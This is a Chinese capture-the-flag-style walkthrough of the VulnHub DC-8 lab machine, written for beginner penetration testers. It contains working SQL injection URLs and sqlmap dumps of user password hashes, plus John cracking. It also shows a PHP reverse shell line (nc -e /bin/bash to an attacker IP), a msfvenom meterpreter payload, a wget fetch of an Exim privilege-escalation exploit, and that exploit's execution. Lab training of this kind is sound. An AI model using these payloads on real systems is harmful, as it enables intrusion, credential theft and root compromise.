资讯专栏INFORMATION COLUMN

靶机DC-8(详细渗透,适合新手渗透)

greatwhole / 2225人阅读

摘要:按照网上的说法,代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。

目录

靶机DC-8 (详细渗透,适合新手渗透)

0x01靶机描述

靶机信息

链接https://www.vulnhub.com/entry/dc-8,367/
发布日期2019年9月4日
作者DCAU
难度简单

0x02环境搭建

1. 下载并导入靶机

打开vmware-文件-打开-DC-8.ova

2. 查看网络适配器

将靶机网络适配器改为NAT模式

3. 启动靶机

点击 ▶靶机,开启成功

0x03靶机渗透

一、 信息收集

1. 主机发现


2. 端口扫描

3. 详细扫描

4. 目录扫描

5. gobuster目录扫描

为了避免漏扫,gobuster再进行目录扫描

6. 网站指纹识别

二、 漏洞挖掘

手工sql注入

1. 通过手工验证,此处url含有sql注入漏洞

http://192.168.30.206/?nid=2 and 1=1 --+

http://192.168.30.206/?nid=2 and 1=2 --+

2. 判断字段数

http://192.168.30.206/?nid=2 order by 1 --+

http://192.168.30.206/?nid=2 order by 2 --+

所以可以看出字段数为1

3. 判断显示位置

http://192.168.30.206/?nid=-2 union select 1 --+

4. 查看当前数据库

5. 查找库d7db中所有的表

http://192.168.30.206/?nid=-2 union select group_concat(table_name) from
information_schema.tables where table_schema=‘d7db’ --+

6. 查找uesrs表中所有的列

http://192.168.30.206/?nid=-2 union select group_concat(column_name) from
information_schema.columns where table_name=‘users’ --+

7. 查询表中的数据

http://192.168.30.206/?nid=-2 union select group_concat(name) from users --+

http://192.168.30.206/?nid=-2 union select group_concat(pass) from users --+

sqlmap自动化执行

1. 查当前数据库
sqlmap -u "http://192.168.30.206/?nid=2" -current-db

2. 查表
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db --tables

3. 查列
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db -T users --columns

4. 查数据
sqlmap -u "http://192.168.30.206/?nid=2" -D d7db -T users -C login,name,pass --dump

查询到两组数据

admin $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5zjohn  $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
4. 使用John进行暴力破解

破解出john的密码trutle

5. 可以将破解出来的密码尝试ssh远程登录

发现ssh远程登录失败,发现需要使用公私钥登录

6. 在此网页尝试登录,该网页由前面目录扫描得到
http://192.168.30.206/user

登录成功

  • 远程代码执行漏洞

1.找到可以编辑php代码的地方

2.尝试写phpinfo代码


发现保存并提交后并没有任何显示。按照网上的说法,php代码保存后会执行代码,这应该是在靶机上已经执行了代码,只是在后台不会显示出来。

三、 漏洞利用

方法一:

1. 编写反弹shell脚本

我们尝试执行PHP反弹shell脚本,将原有的

flag

进行保留,防止报错

<p>flag</p><?phpsystem("nc -e /bin/bash 192.168.30.182 4567");?>

2.保存提交前开启kali进行监听

3. 点击提交发现网页此时正跳转,而我们的攻击机已经拿到shell

方法二:

1. 使用msfvenom制作反弹shell脚本
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.30.182 lport=9999 R >php_shell.txt

2.将php代码复制到网站中

3. kali设置msf选项,进行监听


4.提交代码(此时后台默认执行所编写的php脚本代码)

5. 拿到shell,并用python打开一个标准shell
python -c "import pty;pty.spawn("/bin/bash")"

四、 提权

1.find 命令查找具有sudo权限的命令,发现exim4在使用时具有root权限`
find / -perm -u=s -type f 2>/dev/null

2.查看命令exim4命令版本

Exim version 4.89

3.利用serachsploit查找exim命令的漏洞

4.进行查看用法,发现有两个使用方法

5.将文件复制到/tmp目录,并用python打开一个临时的HTTP服务

6.将46996.sh下载到靶机
wget http://192.168.30.182/46996.sh

进行赋权

执行,但是发现两种方法均发生错误

原因:这个报错是由于windows系统下编辑然后上传到linux系统执行导致的
解决方案:本地编辑查看文件类型:set ff=unix

7.然后我们再重新进行上传

使用第二个提权命令进行提权成功

./46996.sh -m netcat


8.查看flag

0x04实验总结

这个靶机考察了目录扫描,sql注入,远程代码执行,反弹shell,提权时使用find查找可以执行的命令,对命令exim的版本提权漏洞等,是一个不错的靶机,适合新手来渗透

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/119203.html

相关文章

  • 靶机渗透SickOs1.2(非常详细适合新手渗透

    靶机SickOs1.2的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘PUT方法任意写文件漏洞1. 查看web主页2. 查看/test目录支持的方法3. 验证PUT方法,向服务器写入文件4. 访问写入的文件 三、 漏洞利用反弹shell方法一:php一句话木马 + 蚁剑连接反弹shell方法二:curl上传php反弹shell脚本反弹shell方法三:...

    WilsonLiu95 评论0 收藏0
  • 靶机渗透 HACKME-2 (详细渗透适合新手渗透

    摘要:目标是通过漏洞获得有限的权限访问,并随后以根用户身份升级权限。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。 靶...

    young.li 评论0 收藏0
  • 靶机渗透 hackme-1(详解,适合新手

    摘要:目标是通过漏洞获得有限的权限访问,然后权限升级为。使用,并且在可能自行关闭的情况下非常罕见的情况,尝试强制重新启动机器,然后机器应该可以正常工作。 靶机hackm...

    econi 评论0 收藏0
  • 靶机渗透FristiLeaks1.3 ☀️新手详细☀️

    靶机FristiLeaks1.3的目录 0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. dirb目录扫描5. 网站指纹识别 二、 漏洞挖掘base64解密1. 寻找url2. 查看源码,base64解密3. 登录成功 文件上传漏洞1. 尝试修改抓包修改后缀进行绕过,失败2. 进行多后缀文件上传3. 打开上传的文件,显示出...

    RyanQ 评论0 收藏0
  • Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透

    摘要:菜鸡的第一篇学习分享靶机渗透测试实战一入门靶机完全渗透关于是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。 菜鸡的第一篇学习分享 ——Vuln...

    Kahn 评论0 收藏0

发表评论

0条评论

最新活动
阅读需要支付1元查看
<